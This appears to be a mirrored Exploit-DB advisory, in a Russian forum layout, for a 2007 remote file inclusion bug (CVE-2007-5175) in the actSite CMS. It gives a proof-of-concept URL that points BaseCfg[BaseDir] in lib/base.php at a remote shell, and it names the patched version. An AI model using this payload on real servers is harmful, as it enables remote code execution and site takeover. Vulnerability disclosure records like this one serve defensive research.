- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4473
- Проверка EDB
-
- Пройдено
- Автор
- DNX
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-5175
- Дата публикации
- 2007-10-01
Код:
\#'#/
(-.-)
---------------------oOO---(_)---OOo--------------------
| actSite v1.991 Beta (base.php) Remote File Inclusion |
| coded by DNX |
--------------------------------------------------------
[!] Discovered: DNX
[!] Vendor: http://www.actsite.de
[!] Detected: 02.09.2007
[!] Reported: 02.09.2007
[!] Remote: yes
[!] Background: actSite is a content management system based on PHP and MySQL
[!] Bug: $BaseCfg[BaseDir] in lib/base.php
[!] PoC:
- http://[site]/[path]/lib/base.php?BaseCfg[BaseDir]=[shell]
[!] Solution: Install update to v1.995
# milw0rm.com [2007-10-01]- Источник
- www.exploit-db.com
